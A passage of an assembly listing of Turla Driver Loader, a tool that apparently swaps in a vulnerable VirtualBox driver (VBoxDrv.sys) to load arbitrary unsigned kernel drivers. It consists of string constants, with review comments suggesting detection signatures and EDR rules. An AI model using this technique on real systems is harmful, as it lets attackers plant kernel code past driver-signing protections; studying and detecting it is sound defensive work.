    DD imagerel $unwind$TDLStopVulnerableDriver
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLProcessCommandLine DD imagerel $LN11
    DD imagerel $LN11+177
    DD imagerel $unwind$TDLProcessCommandLine
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLMain DD imagerel $LN14
    DD imagerel $LN14+361
    DD imagerel $unwind$TDLMain
pdata ENDS

; ---------------------------------------------------------------------------
; Wide-string constants. Every character is followed by a 00H byte and the literal
; ends with 00H, 00H, i.e. the text is stored as NUL-terminated UTF-16LE.
; ---------------------------------------------------------------------------
; Decoded text: "Ldr: Detected VirtualBox software installation, driver backup will be done"
; COMDAT ??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@
CONST SEGMENT
??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@ DB 'L'
    DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'e', 00H
    DB 't', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e', 00H, 'd', 00H, ' '
    DB 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H
    DB 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H, ' ', 00H, 's', 00H, 'o'
    DB 00H, 'f', 00H, 't', 00H, 'w', 00H, 'a', 00H, 'r', 00H, 'e', 00H
    DB ' ', 00H, 'i', 00H, 'n', 00H, 's', 00H, 't', 00H, 'a', 00H, 'l'
    DB 00H, 'l', 00H, 'a', 00H, 't', 00H, 'i', 00H, 'o', 00H, 'n', 00H
    DB ',', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e'
    DB 00H, 'r', 00H, ' ', 00H, 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H
    DB 'u', 00H, 'p', 00H, ' ', 00H, 'w', 00H, 'i', 00H, 'l', 00H, 'l'
    DB 00H, ' ', 00H, 'b', 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'o', 00H
    DB 'n', 00H, 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; Decoded text: " build "
; COMDAT ??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@
CONST SEGMENT
??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@ DB ' ', 00H, 'b'
    DB 00H, 'u', 00H, 'i', 00H, 'l', 00H, 'd', 00H, ' ', 00H, 00H, 00H ; `string'
CONST ENDS
; Decoded text: "."
; COMDAT ??_C@_13JOFGPIOO@?$AA?4@
CONST SEGMENT
??_C@_13JOFGPIOO@?$AA?4@ DB '.', 00H, 00H, 00H ; `string'
CONST ENDS
; Decoded text: "Ldr: Windows v"
; COMDAT ??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@
CONST SEGMENT
??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@ DB 'L'
    DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'W', 00H, 'i', 00H
    DB 'n', 00H, 'd', 00H, 'o', 00H, 'w', 00H, 's', 00H, ' ', 00H, 'v'
    DB 00H, 00H, 00H ; `string'
CONST ENDS
; The segment opened below holds the next string constant; its data follows on the
; next listing line.
; COMDAT ??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@
CONST SEGMENT
; Wide-string constants of the loader, one COMDAT CONST segment each. Every character
; is followed by 00H and each literal ends with 00H, 00H, so the text is stored as
; NUL-terminated UTF-16LE. The decoded text is given above each literal.
; NOTE(review): because the strings are UTF-16LE, a static content signature built
; from them has to match the wide encoding; a plain single-byte text search will not
; hit them.
;
; Decoded text: "Unsupported WinNT version\r\n"
??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@ DB 'U'
    DB 00H, 'n', 00H, 's', 00H, 'u', 00H, 'p', 00H, 'p', 00H, 'o', 00H
    DB 'r', 00H, 't', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'W', 00H, 'i'
    DB 00H, 'n', 00H, 'N', 00H, 'T', 00H, ' ', 00H, 'v', 00H, 'e', 00H
    DB 'r', 00H, 's', 00H, 'i', 00H, 'o', 00H, 'n', 00H, 0dH, 00H, 0aH
    DB 00H, 00H, 00H ; `string'
CONST ENDS
; Decoded text: "Another instance running, close it before\r\n"
; COMDAT ??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@
CONST SEGMENT
??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@ DB 'A'
    DB 00H, 'n', 00H, 'o', 00H, 't', 00H, 'h', 00H, 'e', 00H, 'r', 00H
    DB ' ', 00H, 'i', 00H, 'n', 00H, 's', 00H, 't', 00H, 'a', 00H, 'n'
    DB 00H, 'c', 00H, 'e', 00H, ' ', 00H, 'r', 00H, 'u', 00H, 'n', 00H
    DB 'n', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ',', 00H, ' ', 00H, 'c'
    DB 00H, 'l', 00H, 'o', 00H, 's', 00H, 'e', 00H, ' ', 00H, 'i', 00H
    DB 't', 00H, ' ', 00H, 'b', 00H, 'e', 00H, 'f', 00H, 'o', 00H, 'r'
    DB 00H, 'e', 00H, 0dH, 00H, 0aH, 00H, 00H, 00H ; `string'
CONST ENDS
; Start-up banner. Decoded text:
;   "Turla Driver Loader v1.1.5 started\r\n(c) 2016 - 2019 TDL Project\r\n
;    Supported x64 OS : 7 and above\r\n"
; NOTE(review): the banner names the tool and its version, which makes it a
; convenient string for identifying an unmodified build of this program.
; COMDAT ??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@
CONST SEGMENT
??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ DB 'T'
    DB 00H, 'u', 00H, 'r', 00H, 'l', 00H, 'a', 00H, ' ', 00H, 'D', 00H
    DB 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'L'
    DB 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' ', 00H
    DB 'v', 00H, '1', 00H, '.', 00H, '1', 00H, '.', 00H, '5', 00H, ' '
    DB 00H, 's', 00H, 't', 00H, 'a', 00H, 'r', 00H, 't', 00H, 'e', 00H
    DB 'd', 00H, 0dH, 00H, 0aH, 00H, '(', 00H, 'c', 00H, ')', 00H, ' '
    DB 00H, '2', 00H, '0', 00H, '1', 00H, '6', 00H, ' ', 00H, '-', 00H
    DB ' ', 00H, '2', 00H, '0', 00H, '1', 00H, '9', 00H, ' ', 00H, 'T'
    DB 00H, 'D', 00H, 'L', 00H, ' ', 00H, 'P', 00H, 'r', 00H, 'o', 00H
    DB 'j', 00H, 'e', 00H, 'c', 00H, 't', 00H, 0dH, 00H, 0aH, 00H, 'S'
    DB 00H, 'u', 00H, 'p', 00H, 'p', 00H, 'o', 00H, 'r', 00H, 't', 00H
    DB 'e', 00H, 'd', 00H, ' ', 00H, 'x', 00H, '6', 00H, '4', 00H, ' '
    DB 00H, 'O', 00H, 'S', 00H, ' ', 00H, ':', 00H, ' ', 00H, '7', 00H
    DB ' ', 00H, 'a', 00H, 'n', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 'b'
    DB 00H, 'o', 00H, 'v', 00H, 'e', 00H, 0dH, 00H, 0aH, 00H, 00H, 00H ; `string'
CONST ENDS
; Decoded text: "Turla Driver Loader v1.1.5 (19/04/19)"
; (presumably the console title, given the SetConsoleTitleW import - confirm in TDLMain)
; COMDAT ??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@
CONST SEGMENT
??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ DB 'T'
    DB 00H, 'u', 00H, 'r', 00H, 'l', 00H, 'a', 00H, ' ', 00H, 'D', 00H
    DB 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'L'
    DB 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' ', 00H
    DB 'v', 00H, '1', 00H, '.', 00H, '1', 00H, '.', 00H, '5', 00H, ' '
    DB 00H, '(', 00H, '1', 00H, '9', 00H, '/', 00H, '0', 00H, '4', 00H
    DB '/', 00H, '1', 00H, '9', 00H, ')', 00H, 00H, 00H ; `string'
CONST ENDS
; Decoded text: "Ldr: Input file not found"
; COMDAT ??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@
CONST SEGMENT
??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@ DB 'L'
    DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'I', 00H, 'n', 00H
    DB 'p', 00H, 'u', 00H, 't', 00H, ' ', 00H, 'f', 00H, 'i', 00H, 'l'
    DB 00H, 'e', 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H
    DB 'f', 00H, 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string'
CONST ENDS
; Decoded text: "Usage: loader DriverToLoad\n\re.g. loader mydrv.sys\r\n"
; The first line break is stored as 0aH, 0dH (LF then CR), the reverse of the CR LF
; order used by the other literals; this is how the data reads, not a decoding slip.
; COMDAT ??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@
CONST SEGMENT
??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@ DB 'U'
    DB 00H, 's', 00H, 'a', 00H, 'g', 00H, 'e', 00H, ':', 00H, ' ', 00H
    DB 'l', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' '
    DB 00H, 'D', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H
    DB 'T', 00H, 'o', 00H, 'L', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 0aH
    DB 00H, 0dH, 00H, 'e', 00H, '.', 00H, 'g', 00H, '.', 00H, ' ', 00H
    DB 'l', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' '
    DB 00H, 'm', 00H, 'y', 00H, 'd', 00H, 'r', 00H, 'v', 00H, '.', 00H
    DB 's', 00H, 'y', 00H, 's', 00H, 0dH, 00H, 0aH, 00H, 00H, 00H ; `string'
CONST ENDS
; Decoded text: "Ldr: Unexpected error while restoring original driver from backup"
; COMDAT ??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@
CONST SEGMENT
??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ DB 'L'
    DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'U', 00H, 'n', 00H
    DB 'e', 00H, 'x', 00H, 'p', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e'
    DB 00H, 'd', 00H, ' ', 00H, 'e', 00H, 'r', 00H, 'r', 00H, 'o', 00H
    DB 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i', 00H, 'l', 00H, 'e'
    DB 00H, ' ', 00H, 'r', 00H, 'e', 00H, 's', 00H, 't', 00H, 'o', 00H
    DB 'r', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'o', 00H, 'r'
    DB 00H, 'i', 00H, 'g', 00H, 'i', 00H, 'n', 00H, 'a', 00H, 'l', 00H
    DB ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r'
    DB 00H, ' ', 00H, 'f', 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H
    DB 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H, 'u', 00H, 'p', 00H, 00H
    DB 00H ; `string'
CONST ENDS
; Decoded text: "Ldr: Original VirtualBox driver restored from backup"
; COMDAT ??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@
CONST SEGMENT
??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@ DB 'L'
    DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'O', 00H, 'r', 00H
    DB 'i', 00H, 'g', 00H, 'i', 00H, 'n', 00H, 'a', 00H, 'l', 00H, ' '
    DB 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H
    DB 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H, ' ', 00H, 'd', 00H, 'r'
    DB 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'r', 00H
    DB 'e', 00H, 's', 00H, 't', 00H, 'o', 00H, 'r', 00H, 'e', 00H, 'd'
    DB 00H, ' ', 00H, 'f', 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H
    DB 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H, 'u', 00H, 'p', 00H, 00H
    DB 00H ; `string'
CONST ENDS
; Decoded text: "Ldr: Error removing driver file"
; COMDAT ??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@
CONST SEGMENT
??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ DB 'L'
    DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
    DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'r', 00H, 'e', 00H, 'm'
    DB 00H, 'o', 00H, 'v', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H
    DB 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' '
    DB 00H, 'f', 00H, 'i', 00H, 'l', 00H, 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; Decoded text: "Ldr: Driver file removed"
; COMDAT ??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@
CONST SEGMENT
??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@ DB 'L'
    DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'r', 00H
    DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'f', 00H, 'i'
    DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'r', 00H, 'e', 00H, 'm', 00H
    DB 'o', 00H, 'v', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string'
CONST ENDS
; Decoded text: "\??\globalroot\systemroot\system32\drivers\VBoxDrv.sys"
; An NT object-manager path to VBoxDrv.sys in the system drivers directory.
; NOTE(review): next to the "driver file removed" / "restored from backup" messages
; above, this suggests the program writes, deletes or replaces that file (confirm in
; the code that references this label). A file-integrity or EDR rule watching writes
; and deletes of drivers\VBoxDrv.sys by anything other than the VirtualBox installer
; covers that behaviour, and a kernel-driver block policy keeps a known-vulnerable
; driver image from loading at all.
; COMDAT ??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@
CONST SEGMENT
??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@ DB '\'
    DB 00H, '?', 00H, '?', 00H, '\', 00H, 'g', 00H, 'l', 00H, 'o', 00H
    DB 'b', 00H, 'a', 00H, 'l', 00H, 'r', 00H, 'o', 00H, 'o', 00H, 't'
    DB 00H, '\', 00H, 's', 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H
    DB 'm', 00H, 'r', 00H, 'o', 00H, 'o', 00H, 't', 00H, '\', 00H, 's'
    DB 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, '3', 00H
    DB '2', 00H, '\', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e'
    DB 00H, 'r', 00H, 's', 00H, '\', 00H, 'V', 00H, 'B', 00H, 'o', 00H
    DB 'x', 00H, 'D', 00H, 'r', 00H, 'v', 00H, '.', 00H, 's', 00H, 'y'
    DB 00H, 's', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT
??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ CONST SEGMENT ??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'r', 00H, 'e', 00H, 'm' DB 00H, 'o', 00H, 'v', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H DB 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ' DB 00H, 'e', 00H, 'n', 00H, 't', 00H, 'r', 00H, 'y', 00H, ' ', 00H DB 'f', 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H, 'r', 00H, 'e' DB 00H, 'g', 00H, 'i', 00H, 's', 00H, 't', 00H, 'r', 00H, 'y', 00H DB 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@ CONST SEGMENT ??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'r', 00H DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'e', 00H, 'n' DB 00H, 't', 00H, 'r', 00H, 'y', 00H, ' ', 00H, 'r', 00H, 'e', 00H DB 'm', 00H, 'o', 00H, 'v', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'f' DB 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H, 'r', 00H, 'e', 00H DB 'g', 00H, 'i', 00H, 's', 00H, 't', 00H, 'r', 00H, 'y', 00H, 00H DB 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ CONST SEGMENT ??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'U', 00H, 'n', 00H DB 'e', 00H, 'x', 00H, 'p', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e' DB 00H, 'd', 00H, ' ', 00H, 'e', 00H, 'r', 00H, 'r', 00H, 'o', 00H DB 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i', 00H, 'l', 00H, 'e' DB 00H, ' ', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o', 00H, 'a', 00H DB 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'd', 
00H, 'r' DB 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ CONST SEGMENT ??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'u', 00H DB 'l', 00H, 'n', 00H, 'e', 00H, 'r', 00H, 'a', 00H, 'b', 00H, 'l' DB 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H DB 'e', 00H, 'r', 00H, ' ', 00H, 's', 00H, 'u', 00H, 'c', 00H, 'c' DB 00H, 'e', 00H, 's', 00H, 's', 00H, 'f', 00H, 'u', 00H, 'l', 00H DB 'l', 00H, 'y', 00H, ' ', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o' DB 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@ CONST SEGMENT ??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'C', 00H, 'a', 00H DB 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'o', 00H, 'p' DB 00H, 'e', 00H, 'n', 00H, ' ', 00H, 'd', 00H, 'a', 00H, 't', 00H DB 'a', 00H, 'b', 00H, 'a', 00H, 's', 00H, 'e', 00H, ',', 00H, ' ' DB 00H, 'u', 00H, 'n', 00H, 'a', 00H, 'b', 00H, 'l', 00H, 'e', 00H DB ' ', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd' DB 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H DB 'r', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@ CONST SEGMENT ??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'U', 00H, 'n', 00H DB 'l', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'i', 00H, 'n', 00H, 'g' DB 00H, ' ', 00H, 'v', 00H, 'u', 00H, 'l', 00H, 'n', 00H, 'e', 00H DB 'r', 00H, 'a', 00H, 'b', 00H, 
'l', 00H, 'e', 00H, ' ', 00H, 'd' DB 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ CONST SEGMENT ??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'u', 00H DB 'l', 00H, 'n', 00H, 'e', 00H, 'r', 00H, 'a', 00H, 'b', 00H, 'l' DB 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H DB 'e', 00H, 'r', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd' DB 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H, 'u', 00H DB 'r', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@ CONST SEGMENT ??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'r', 00H DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'd', 00H, 'e' DB 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, ' ', 00H, 'o', 00H DB 'p', 00H, 'e', 00H, 'n', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i' DB 00H, 'l', 00H, 'u', 00H, 'r', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ CONST SEGMENT ??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'u', 00H DB 'l', 00H, 'n', 00H, 'e', 00H, 'r', 00H, 'a', 00H, 'b', 00H, 'l' DB 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H DB 'e', 00H, 'r', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd' DB 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 'n', 00H, 'd', 00H DB ' ', 00H, 'o', 00H, 'p', 00H, 'e', 00H, 'n', 00H, 'e', 00H, 'd' DB 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT 
